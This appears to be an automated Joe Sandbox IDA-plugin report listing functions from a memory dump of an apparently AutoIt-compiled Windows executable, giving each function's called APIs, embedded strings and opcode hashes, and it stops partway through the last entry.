                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c2308bd2b59363eb380d9f2aadf6ae7fcc9e74111fd97fe2ff68e231cb56cb52
                                                                            • Instruction ID: 8ab9987c76b6c57547caff76c48adb598fa88ddee982990f9fc9c9b3ebf0a56b
                                                                            • Opcode Fuzzy Hash: c2308bd2b59363eb380d9f2aadf6ae7fcc9e74111fd97fe2ff68e231cb56cb52
                                                                            • Instruction Fuzzy Hash: 7B21D133F2444286E718DF76D852AB977A5E360758F88C13AC52B87384CE3CE906C760
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f4e4605b7b007d95894f61c83fec82003118576a017aad510c5c4214a882ee24
                                                                            • Instruction ID: 4bef3c01b5ccc12934d8ea80990b785d33bca910732f5103b2f97aacd813c4fc
                                                                            • Opcode Fuzzy Hash: f4e4605b7b007d95894f61c83fec82003118576a017aad510c5c4214a882ee24
                                                                            • Instruction Fuzzy Hash: 85F04471B196568ADBA4DF2CB4426297791E7083D0B908439D68983E44DA3C9061DF14
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 06a18b8ad93dc8222913c3b18848eb7fe0d0fd2f3d8a242d5e2f0303cc3a2d96
                                                                            • Instruction ID: 371c923ef23cfdb5f65ad565caee7a38b9207d5598464f8813646b0738760794
                                                                            • Opcode Fuzzy Hash: 06a18b8ad93dc8222913c3b18848eb7fe0d0fd2f3d8a242d5e2f0303cc3a2d96
                                                                            • Instruction Fuzzy Hash: F2A0022590EC02D4E624BB20FC50870BB31EF50390BD104B2D00D42476EF3CA4A2C320
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$DriveType
                                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                            • API String ID: 2907320926-4222207086
                                                                            • Opcode ID: bbb8373922c4c1ac776fb25ab571143455ae640d91028c4cde848772eb275b70
                                                                            • Instruction ID: ea21a390ca632f462b71ad3510a1c69aa2108c62862f69551841ebbcabae3ccc
                                                                            • Opcode Fuzzy Hash: bbb8373922c4c1ac776fb25ab571143455ae640d91028c4cde848772eb275b70
                                                                            • Instruction Fuzzy Hash: 0EB16C21B1EA0394EA74BB39D8409BCAB61FF807D5BD44131D91E47699EF2CE9678320
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Color$LongWindow$ModeObjectStockText
                                                                            • String ID:
                                                                            • API String ID: 554392163-0
                                                                            • Opcode ID: 75ec6bcd28a8efb3125b08e197a7caecd4c99aa61c3caa47667afd5c8d51fa7a
                                                                            • Instruction ID: 77cb4ec7716a0f78fa2a9e07773626ffbe231e752020eea0480d77a5ffa8d675
                                                                            • Opcode Fuzzy Hash: 75ec6bcd28a8efb3125b08e197a7caecd4c99aa61c3caa47667afd5c8d51fa7a
                                                                            • Instruction Fuzzy Hash: 0281CA21E0C55741EA70B73D9848A79AB91BF45BE4FD50231C99E077E4DF3CA8A38721
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: wcscat$FileInfoQueryValueVersion$Sizewcscpywcsstr
                                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                            • API String ID: 222038402-1459072770
                                                                            • Opcode ID: 2b452cf843a402516bc94fd48c8ebc97225daa6de840f4512dc78cc620abe9a7
                                                                            • Instruction ID: 1aabe9c791cfc33ad1567f7ebe03032db0a4c722f85c46cdd5062e24172c6e24
                                                                            • Opcode Fuzzy Hash: 2b452cf843a402516bc94fd48c8ebc97225daa6de840f4512dc78cc620abe9a7
                                                                            • Instruction Fuzzy Hash: EE518D2171C64286EA24FB3295459B9AB91BF85FE0FC08471ED0D47B86DF3CE5138324
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharMessageSendUpper
                                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                            • API String ID: 3974292440-4258414348
                                                                            • Opcode ID: 3f2e69d4aa51dbb406168e8eec17f7dda2e2331c7f002e480690ed7ff1453b94
                                                                            • Instruction ID: b2dcfce28c6c1bcbddf722cfa12741751c3751b8279c661fe4aadc9d32a381f1
                                                                            • Opcode Fuzzy Hash: 3f2e69d4aa51dbb406168e8eec17f7dda2e2331c7f002e480690ed7ff1453b94
                                                                            • Instruction Fuzzy Hash: E912B292B18657C2EE70BB7984819BDAFA1AF54FD4BC84531DA4D47781EE2CE4638320
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreenwcscat
                                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                            • API String ID: 2091158083-3440237614
                                                                            • Opcode ID: 1dfcd66b1beb431dd94c898c6b643c1c8ea49badc5456dbef34fa79d17b29ff8
                                                                            • Instruction ID: 99462459833bb0e10f3059ab82be4a9eb116a36e6101510a9d6aab9a2dbab53a
                                                                            • Opcode Fuzzy Hash: 1dfcd66b1beb431dd94c898c6b643c1c8ea49badc5456dbef34fa79d17b29ff8
                                                                            • Instruction Fuzzy Hash: 5C712032618A8296E720FB35E855BEDAB20FB84BD4FC00032EA4D07A99DF7CD556C750
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: SendString$BuffCharDriveLowerType
                                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                            • API String ID: 1600147383-4113822522
                                                                            • Opcode ID: f7a7ab7ec1fa580d5e6ff973f8f4b9d76ff6f996739de9da71bd8b134ea55aea
                                                                            • Instruction ID: 3f46b166e2bc2e4e44dbc532236bb02bee6b7d33e4b2b98f71fd4b1b0074ac62
                                                                            • Opcode Fuzzy Hash: f7a7ab7ec1fa580d5e6ff973f8f4b9d76ff6f996739de9da71bd8b134ea55aea
                                                                            • Instruction Fuzzy Hash: 0A819F22B14A1285EB20AB75D852ABCABB1FB54BD4B944431CE0D47795EF3CE957C320
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Load$Image$IconLibraryMessageSend_invalid_parameter_noinfo$DestroyExtractFree
                                                                            • String ID: .dll$.exe$.icl
                                                                            • API String ID: 258715311-1154884017
                                                                            • Opcode ID: e03b8a297f3e31543187ea4d980dcab107f3fc290ba37e0d0746b7471e731d00
                                                                            • Instruction ID: a01ccaa4497282aff6d9cfbe1b35b1208dea6072c5d067cd188407103566aa42
                                                                            • Opcode Fuzzy Hash: e03b8a297f3e31543187ea4d980dcab107f3fc290ba37e0d0746b7471e731d00
                                                                            • Instruction Fuzzy Hash: 9971C232A1865282EB34BF359844AB9ABA0FF44BD8F940A36ED5D47794DF3CD456C310
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                            • String ID:
                                                                            • API String ID: 3840717409-0
                                                                            • Opcode ID: 7c311c18288b1496fa214aa0c4abe44590be5c31b38ad7f7d9d564ed982c3a32
                                                                            • Instruction ID: e3b657fa55fb7091f390b795756c5ec43d8f385a27dca8a59a12f02f01516cc7
                                                                            • Opcode Fuzzy Hash: 7c311c18288b1496fa214aa0c4abe44590be5c31b38ad7f7d9d564ed982c3a32
                                                                            • Instruction Fuzzy Hash: A9517536B14B0186EB24EF72E808A6D7BA0FB88B98B904531DE2E43B44DF3DD416C710
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Filewcscat$DeleteTemp$NamePath_fread_nolock_invalid_parameter_noinfowcscpy
                                                                            • String ID: aut
                                                                            • API String ID: 130057722-3010740371
                                                                            • Opcode ID: c4caddb39eaee0ea37527165baf1375b84cec99aff813e3a0a5a195433975e43
                                                                            • Instruction ID: 8546f699f0b00e240363c2fef7214972f17ea1eae032029a1cb409ba9c983d78
                                                                            • Opcode Fuzzy Hash: c4caddb39eaee0ea37527165baf1375b84cec99aff813e3a0a5a195433975e43
                                                                            • Instruction Fuzzy Hash: A1C14172718A8695EB30EF35E840AE9AB60FB857C8F804136EA4D47A59DF7CD216C710
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopRect
                                                                            • String ID: tooltips_class32
                                                                            • API String ID: 2443926738-1918224756
                                                                            • Opcode ID: aaeb60d555cc86bf3e66e764e60d0e4162c92bacd9f6913f3df39f71d352b9df
                                                                            • Instruction ID: 7213b19223c75d4888fdf4e1178a1a242b441ad48d8527b2810ab0bac806ec75
                                                                            • Opcode Fuzzy Hash: aaeb60d555cc86bf3e66e764e60d0e4162c92bacd9f6913f3df39f71d352b9df
                                                                            • Instruction Fuzzy Hash: C2916B32A18A8685E760EF75E494BADBBA1EB84BD4F814036DE4D07B58DF3CD056C720
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                            • String ID:
                                                                            • API String ID: 2598888154-3916222277
                                                                            • Opcode ID: 528b72066858b9ed5150b72f7d283d240cd81545529c42844d8e0930b848dd07
                                                                            • Instruction ID: 7ca6e90655c9f5af41f10ba182403cfed94475ce61c9a0cf7ea3368eb0c8df85
                                                                            • Opcode Fuzzy Hash: 528b72066858b9ed5150b72f7d283d240cd81545529c42844d8e0930b848dd07
                                                                            • Instruction Fuzzy Hash: 70515776B19641CBE760EF75E844A9DBBA1FB48BC8F408125EE4953B18CF3CD4668B10
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                            • String ID: NULL Pointer assignment
                                                                            • API String ID: 2706829360-2785691316
                                                                            • Opcode ID: f387a50e6818b73d110b12cd73088d785cdd73093c11eac48bc39c6d5f3c3ae3
                                                                            • Instruction ID: 38f39f6d24c40342ed6e524c984b6d2f1331c8f23ae3de040c498dc0bb9f1a30
                                                                            • Opcode Fuzzy Hash: f387a50e6818b73d110b12cd73088d785cdd73093c11eac48bc39c6d5f3c3ae3
                                                                            • Instruction Fuzzy Hash: 79514F22A15A62CAEB50EF75D885ABDAB71FF84BC9F804031EA0E47655DF3CE056C350
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?,?,00000000,?,?,?,00007FF7978CFD7B), ref: 00007FF7978D1143
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharUpper
                                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                            • API String ID: 3964851224-909552448
                                                                            • Opcode ID: 48ce5f8ab7038dd94976e3b00d3167ae2925137fb7b03817e14e3f39c5b841c4
                                                                            • Instruction ID: 3ce7ab6b7f4624675b7c1af1581b145e635b72dded86dd2f7fe3e09eb0d41ea1
                                                                            • Opcode Fuzzy Hash: 48ce5f8ab7038dd94976e3b00d3167ae2925137fb7b03817e14e3f39c5b841c4
                                                                            • Instruction Fuzzy Hash: 10E1A012F0865781EA74BB75D880AB8ABA1BF10BD8BC64531D91D477D4EE3CE967C320
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentDirectory$AttributesFilewcscat$wcscpy
                                                                            • String ID: *.*
                                                                            • API String ID: 4125642244-438819550
                                                                            • Opcode ID: 0b4a78bed0a1e3d67edb204e894bb16d3c88e8abde9262453b8d1c5fbae37bd8
                                                                            • Instruction ID: f4eb40b16b1536a11a1c91b12be6f547b9275cd787995c2624ccdba192e4961b
                                                                            • Opcode Fuzzy Hash: 0b4a78bed0a1e3d67edb204e894bb16d3c88e8abde9262453b8d1c5fbae37bd8
                                                                            • Instruction Fuzzy Hash: C2819122618A8296EB30EF25D840ABDABA0FB44BC4FC44036DA4E47795DF7CD567C760
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                            • String ID: P
                                                                            • API String ID: 1460738036-3110715001
                                                                            • Opcode ID: 4dd59e6d1558c8a6b3d6081974aba30fa7f71434e2b387c4c799af0a0850d775
                                                                            • Instruction ID: 4e5392590daec62e6fc1eb7e30525a5a2a98cd4c505afbf83a917a78fbbc45ad
                                                                            • Opcode Fuzzy Hash: 4dd59e6d1558c8a6b3d6081974aba30fa7f71434e2b387c4c799af0a0850d775
                                                                            • Instruction Fuzzy Hash: 34711322A0864256EB74FF749441ABDABA1BF847C8F944431DA4E47A81CF7CE467C721
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: LoadStringwprintf
                                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                            • API String ID: 3297454147-3080491070
                                                                            • Opcode ID: 59800c54c1d345ecb424e2fcfa2246da67464ce5bbb623b99681ad9037b4dde3
